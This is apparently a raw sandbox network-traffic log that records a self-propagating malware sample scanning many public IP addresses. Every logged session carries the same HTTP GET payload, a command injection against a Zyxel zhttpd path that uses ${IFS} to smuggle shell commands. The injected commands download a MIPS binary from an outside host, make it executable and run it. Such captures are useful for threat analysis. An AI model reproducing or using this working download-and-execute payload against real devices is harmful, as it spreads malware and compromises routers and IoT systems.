                                                        Feb 2, 2024 06:21:18.089348078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6338192.168.2.145838884.29.79.79443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.089395046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6339192.168.2.1453298185.81.114.217443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.089418888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6340192.168.2.144585218.135.61.227443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.089462042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6341192.168.2.1446616111.179.50.68443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.089520931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6342192.168.2.1457004122.70.176.19443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.089562893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6343192.168.2.144290012.128.110.90443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.089595079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6344192.168.2.1433132191.41.109.184443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.089624882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6345192.168.2.1445662186.69.220.109443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.089651108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6346192.168.2.1455916120.32.104.125443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.089687109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6347192.168.2.1450182201.108.104.175443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.089719057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6348192.168.2.1438120183.211.236.227443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.089772940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6349192.168.2.1457660220.63.66.77443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.089802980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6350192.168.2.144554053.8.56.216443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.089842081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6351192.168.2.1450530174.126.30.127443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.089915037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6352192.168.2.144207485.219.227.172443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.089917898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6353192.168.2.1455538171.97.163.133443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.089946032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6354192.168.2.145409091.130.216.160443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.090006113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6355192.168.2.1458828166.132.163.249443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.090039968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6356192.168.2.1446604105.58.215.174443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.090096951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6357192.168.2.1458312167.8.57.208443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.090121984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6358192.168.2.1435620217.125.57.190443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.090157032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6359192.168.2.1433792125.176.231.146443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.090202093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6360192.168.2.1433222115.245.104.214443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.090212107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6361192.168.2.1448962187.61.89.231443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.090270042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6362192.168.2.1446978175.206.210.89443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.090297937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6363192.168.2.145777868.82.211.64443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.090358973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6364192.168.2.1460752143.192.135.13443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.090384007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6365192.168.2.1435694218.46.224.14443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.090403080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6366192.168.2.1446496106.176.98.242443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.090461016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6367192.168.2.1446846190.40.178.129443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.090492964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6368192.168.2.1436028111.30.103.130443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.090543985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6369192.168.2.145130453.135.220.85443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.090580940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6370192.168.2.1457378216.124.77.145443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.090630054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6371192.168.2.144995434.153.189.184443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.090660095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6372192.168.2.1460798121.213.229.117443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.090702057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6373192.168.2.144346669.225.101.228443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.090727091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6374192.168.2.143754665.197.58.216443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.090773106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6375192.168.2.1451086202.35.255.98443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.090812922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6376192.168.2.144812864.212.106.188443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.090852976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6377192.168.2.1453136197.129.7.81443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.090890884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6378192.168.2.1453650171.233.168.54443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.090944052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6379192.168.2.1450078157.163.139.218443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.090965033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6380192.168.2.1433896133.69.61.9443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.091031075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6381192.168.2.146011636.18.150.147443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.091084003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6382192.168.2.1439354136.69.129.191443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.091094017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6383192.168.2.1437238171.1.237.96443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.091146946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6384192.168.2.1453496140.6.125.60443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.091171026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6385192.168.2.1436352120.77.98.190443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.091198921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6386192.168.2.1456244177.45.31.188443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.091240883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6387192.168.2.1432798184.0.22.117443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.091300011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6388192.168.2.1435416184.203.136.132443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.091336012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6389192.168.2.1455362129.51.38.118443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.091377020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6390192.168.2.143976813.68.106.169443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.091408014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6391192.168.2.145247292.130.143.63443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.091450930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6392192.168.2.143304881.85.92.144443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.091496944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6393192.168.2.143691443.181.227.243443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.091540098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6394192.168.2.145664838.168.252.2443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.091583014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6395192.168.2.144400243.222.142.145443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.091617107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6396192.168.2.143957676.190.15.91443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.091643095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6397192.168.2.1446414149.166.0.243443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.091674089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6398192.168.2.1449418185.212.104.160443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.091722965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6399192.168.2.1448646154.207.239.152443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.091742039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6400192.168.2.1440986196.182.133.95443
                                                        TimestampBytes transferredDirectionData
